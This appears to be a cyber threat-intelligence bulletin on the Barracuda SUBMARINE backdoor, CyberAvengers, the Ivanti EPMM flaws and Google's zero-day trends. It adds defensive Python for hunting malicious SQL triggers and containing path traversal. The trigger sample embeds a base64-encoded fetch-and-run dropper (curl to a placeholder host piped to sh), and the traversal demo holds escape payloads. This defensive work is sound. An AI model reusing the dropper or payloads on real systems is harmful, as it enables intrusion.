Malware Activity
CISA Discloses Details of Previously Unknown Backdoor "SUBMARINE" Impacting Recently Exploited Barracuda Appliance
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert on July 28, 2023, regarding three (3) new malware analysis reports associated with the exploitation of CVE-2023-2868 in the Barracuda Email Security Gateway (ESG) appliance. CVE-2023-2868 (CVSS score 9.8/10) is a remote command injection vulnerability that was exploited as a zero-day beginning in October 2022. The alert noted that the threat actor responsible exploited the vulnerability to "gain initial access to victim systems and then implanted backdoors to establish and maintain persistence." Prior to the alert, researchers had detailed that UNC4841, a suspected China-nexus espionage actor, is believed to have exploited the Barracuda vulnerability in 2022. Three (3) malware variants were detailed in the alert, but one (1) backdoor, dubbed "SUBMARINE" (also known as "DEPTHCHARGE"), was previously unknown. CISA explained that SUBMARINE is a "novel persistent backdoor" comprising multiple artifacts, "including a SQL trigger, shell scripts, and a loaded library for a Linux daemon", that together provide execution with root privileges, command-and-control (C2), persistence, and cleanup. The agency also noted that the backdoor lives in a Structured Query Language (SQL) database on the ESG appliance and poses a severe threat for lateral movement. Additional details as well as indicators of compromise (IOCs) can be viewed in CISA's alert and the accompanying malware analysis reports.
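A backdoor whose loader is a database trigger will not show up in a file-system sweep, so one practical hunt is to dump the appliance database and review every trigger body for anything that reaches the host. The Python below is an added illustration of that hunt; it is not code from CISA, Barracuda, or Ankura, the dump text is constructed, and the trigger names and the "dropper" body are hypothetical rather than SUBMARINE indicators. It flags triggers that write or read host files (`INTO OUTFILE`/`DUMPFILE`, `LOAD_FILE`), carry long encoded literals, or reference system paths, which are the constructs a legitimate audit trigger never needs.

```python
"""Hunt for suspicious triggers in a MySQL/MariaDB dump (added example).

Not from the CISA alert or Barracuda. SAMPLE_DUMP is constructed; the trigger
names and bodies are hypothetical. Point hunt() at real
`mysqldump --routines --triggers` output to list triggers worth a closer look.
"""
import re

# One match per CREATE TRIGGER ... END block (DEFINER clause optional).
TRIGGER_RE = re.compile(
    r"CREATE\s+(?:DEFINER\s*=\s*\S+\s+)?TRIGGER\s+`?(?P<name>\w+)`?\s+"
    r"(?P<timing>BEFORE|AFTER)\s+(?P<event>INSERT|UPDATE|DELETE)\s+ON\s+`?(?P<table>\w+)`?"
    r"(?P<body>.*?)\bEND\b",
    re.IGNORECASE | re.DOTALL,
)

# Trigger bodies normally touch only tables; these constructs reach the host.
FILE_IO = re.compile(r"\b(INTO\s+(?:OUTFILE|DUMPFILE)|LOAD_FILE)\b", re.IGNORECASE)
# Long hex or base64 literals are a common way to smuggle a script into a trigger.
ENCODED_BLOB = re.compile(r"(?:0x[0-9A-Fa-f]{40,}|'[A-Za-z0-9+/=]{40,}')")
# Paths a trigger has no business naming (drop sites, init/cron, library dirs).
SENSITIVE_PATH = re.compile(r"/(?:etc|tmp|var/tmp|dev/shm|usr/lib)/", re.IGNORECASE)


def find_triggers(dump_text):
    """Return one dict (name, timing, event, table, body) per trigger in the dump."""
    return [m.groupdict() for m in TRIGGER_RE.finditer(dump_text)]


def score_trigger(trigger):
    """Return the reasons a trigger looks suspicious (empty list if none)."""
    body = trigger["body"]
    reasons = []
    if FILE_IO.search(body):
        reasons.append("writes or reads host files")
    if ENCODED_BLOB.search(body):
        reasons.append("contains a long encoded literal")
    if SENSITIVE_PATH.search(body):
        reasons.append("references a system path")
    return reasons


def hunt(dump_text):
    """Map trigger name -> reasons, for every suspicious trigger in the dump."""
    findings = {}
    for trig in find_triggers(dump_text):
        reasons = score_trigger(trig)
        if reasons:
            findings[trig["name"]] = reasons
    return findings


# Constructed sample: one ordinary audit trigger and one hypothetical dropper
# that decodes an embedded script and writes it to /tmp on each insert.
SAMPLE_DUMP = r"""
DELIMITER ;;
CREATE DEFINER=`root`@`localhost` TRIGGER `audit_ins` AFTER INSERT ON `users`
FOR EACH ROW BEGIN
  INSERT INTO audit_log (user_id, action) VALUES (NEW.id, 'insert');
END ;;
CREATE TRIGGER `evil_ins` BEFORE INSERT ON `mail_queue`
FOR EACH ROW BEGIN
  SELECT FROM_BASE64('IyEvYmluL3NoCmN1cmwgaHR0cDovL2V4YW1wbGUuaW52YWxpZC9zIHwgc2gK')
  INTO DUMPFILE '/tmp/.x.sh';
END ;;
DELIMITER ;
"""

if __name__ == "__main__":
    for name, reasons in hunt(SAMPLE_DUMP).items():
        print(f"{name}: {', '.join(reasons)}")
```

The regexes are deliberately loose: the goal is a short review list for an analyst, not a verdict, so a benign trigger that happens to use `LOAD_FILE` will be listed and can be cleared by hand.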
Threat Actor Activity
Threat Profile: CyberAvengers
Over the weekend, the Israeli oil refinery BAZAN Group suffered an extensive distributed denial-of-service (DDoS) attack claimed by a relatively quiet threat group calling itself CyberAvengers (a.k.a. CyberAv3ngers). The actors originally formed the group in 2020 but have stayed under the radar for much of the time since. The group appears to be primarily focused on attacking critical infrastructure organizations throughout Israel, specifically electrical grids and service providers. One (1) such claimed attack targeted the Israeli power grid, where the attackers allegedly destabilized the power supply to key cities throughout the region, including Herzliya, Tel Aviv, Netanya, Bat Yam, and others. These attacks were attributed to CyberAvengers after the group's social media accounts shared videos claiming responsibility for causing over 7,500 outages across these cities. CyberAvengers was also suspected of compromising critical water assets in the region shortly after the power grid attacks, but nothing beyond the timing pointed to the group. Since those attacks, the group had remained passive until the recent DDoS attack on BAZAN Group. Researchers are unsure whether the group will continue its attacks in the coming weeks or take another hiatus. CTIX continues to monitor threat actor activity worldwide and will provide additional updates accordingly.
Vulnerabilities
Ivanti Patches Critical Vulnerabilities Under Active Attack
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an urgent alert after Ivanti disclosed two (2) critical vulnerabilities impacting its Endpoint Manager Mobile (EPMM) solution. The flaws are under active exploitation by threat actors targeting Norwegian government agencies. Ivanti's Endpoint Manager Mobile is a mobile device management platform that allows an organization's IT administrators to set policies for mobile devices, applications, and content. The first vulnerability, tracked as CVE-2023-35078, is a critical remote authentication bypass that lets unauthenticated remote attackers reach otherwise-restricted API paths and, from there, add administrative EPMM accounts, pilfer personally identifiable information (PII), and change critical configuration settings. The second vulnerability, tracked as CVE-2023-35081, is a path traversal flaw that allows an authenticated administrator to perform arbitrary file writes to the EPMM server. Chained with CVE-2023-35078, it lets an attacker bypass authentication and then write arbitrary files to the EPMM server. According to Ivanti, "Successful exploitation can be used to write malicious files to the appliance, ultimately allowing a malicious actor to execute OS commands on the appliance as the tomcat user." According to Shodan scans, more than 2,600 EPMM user portals are currently exposed to the public internet, with nineteen (19) of them linked to U.S. state and local government agencies. The technical details of the attacks have not yet been made public, giving as many organizations as possible time to patch before exploitation becomes widespread. CTIX analysts urge all Ivanti EPMM administrators to ensure they are running the latest patched versions of the software to prevent further exploitation of these vulnerabilities.
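The chain above ends in a file write to a path the attacker chooses, which is the path traversal class of bug. Since Ivanti had not published the internals of CVE-2023-35081 at the time of writing, the Python below is an added, generic illustration of that class and is not Ivanti's code: `save_upload_naive` is the weak pattern (joining a caller-supplied name onto the upload root and trusting the result), and `save_upload` is the hardened form, which resolves symlinks on both sides and refuses any target not strictly beneath the root. The `demo()` function runs three constructed traversal payloads (a `../` prefix, an absolute path, and a `..` buried after a fake subdirectory) plus an attacker-planted symlink against both handlers, all inside a throwaway temporary directory.

```python
"""Path-traversal containment for a file-write endpoint (added example).

Not Ivanti code: this models the vulnerability class only. All paths are
constructed under a temporary directory created by demo().
"""
import os
import tempfile


class TraversalError(ValueError):
    """Raised when a requested file name would land outside the upload root."""


def save_upload_naive(root, name, data):
    """Weak: os.path.join trusts `name`, so '../x' or '/abs/x' escapes `root`."""
    path = os.path.join(root, name)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def resolve_inside(root, name):
    """Return the absolute target for `name`, or raise TraversalError.

    realpath() on both sides collapses '..' segments and follows symlinks, so a
    link planted inside `root` cannot redirect the write. The trailing separator
    in the comparison stops '/srv/uploads_evil' passing as a child of
    '/srv/uploads'. os.path.join discards `root` when `name` is absolute, and
    that case is caught by the same containment check.
    """
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, name))
    if not target.startswith(root_real + os.sep):
        raise TraversalError(f"refusing to write outside {root_real}: {name!r}")
    return target


def save_upload(root, name, data):
    """Hardened: writes only to a path proven to be strictly under `root`."""
    target = resolve_inside(root, name)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def demo():
    """Run constructed payloads through both handlers.

    Returns {name: (naive_escaped_root, hardened_rejected)}.
    """
    base = tempfile.mkdtemp()
    root = os.path.join(base, "uploads")
    os.makedirs(root)
    root_real = os.path.realpath(root)
    # Constructed payloads; each tries to land a file in `base` instead of `root`.
    payloads = [
        "../escaped.txt",
        os.path.join(base, "absolute.txt"),
        "sub/../../escaped2.txt",
    ]
    try:
        os.symlink(base, os.path.join(root, "link"))  # attacker-planted link
        payloads.append("link/via_symlink.txt")
    except OSError:
        pass  # platform without symlink support; skip that case
    results = {}
    for name in payloads:
        written = save_upload_naive(root, name, b"x")
        naive_escaped = not os.path.realpath(written).startswith(root_real + os.sep)
        try:
            save_upload(root, name, b"x")
            hardened_rejected = False
        except TraversalError:
            hardened_rejected = True
        results[name] = (naive_escaped, hardened_rejected)
    # A legitimate nested name must still be accepted by the hardened handler.
    ok = save_upload(root, "reports/q3.txt", b"ok")
    results["reports/q3.txt"] = (False, not ok.startswith(root_real + os.sep))
    return results


if __name__ == "__main__":
    for name, (escaped, rejected) in demo().items():
        print(f"{name!r}: naive escaped={escaped}, hardened rejected={rejected}")
```

Blocklisting `../` is not a substitute for this check: URL-encoded, double-encoded, and backslash variants all decode to the same thing by the time `open()` sees them, and none of them matter once the resolved path is compared against the root.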
- The Hacker News: Ivanti EPMM Vulnerabilities Article
- The Record: Ivanti EPMM Vulnerabilities Article
- Bleeping Computer: Ivanti EPMM Vulnerabilities Article
- Shodan: Scan of exposed US Entities
- CISA: Ivanti EPMM Vulnerabilities Urgent Warning
Honorable Mention
Google Vulnerability Report Sheds Light on Trends to Keep an Eye On
A recent vulnerability report by Google offered interesting statistics about in-the-wild exploitation over the last year, while also highlighting the long-standing problem of known zero-day flaws for which patches are not released in a timely manner. Overall, while 2022 saw a 40% drop in the number of discovered in-the-wild zero-days compared with 2021, that may not be as big of a win for security as it first appears. The starkest development in 2022 was the way zero-day vulnerabilities act as n-days for threat actors on Android. An n-day vulnerability is a software flaw that has been known to the public for "n" days, with or without a patch. The discrepancy is caused by a gap in the Android ecosystem between the upstream vendor (Google) and downstream manufacturers (phone makers): the upstream vendor fixes a bug upon discovering a zero-day, but it can take months for downstream device manufacturers to ship the available patch in their own versions of Android. Hence, zero-day vulnerabilities that have already been discovered and fixed upstream can act as n-day vulnerabilities that are publicly known but still unpatched on devices, leaving them open to exploitation until the manufacturer finally rolls out the patch. While upstream/downstream gaps exist elsewhere, the report found them to be more prevalent and longer lasting on Android. Other findings from the 2022 report include a shift, in response to security improvements made by browser vendors, toward zero-click vulnerabilities that target device components and do not require victims to click on anything to be compromised. While security experts said they knew of multiple attackers using zero-click exploits, no in-the-wild zero-click exploits were publicly recorded in 2022. However, this may be because they are much harder to detect than traditional device compromises.
Additionally, around 40% of zero-day vulnerabilities that were discovered in-the-wild in 2022 were variants of previously reported vulnerabilities.
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.
© Copyright 2023. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.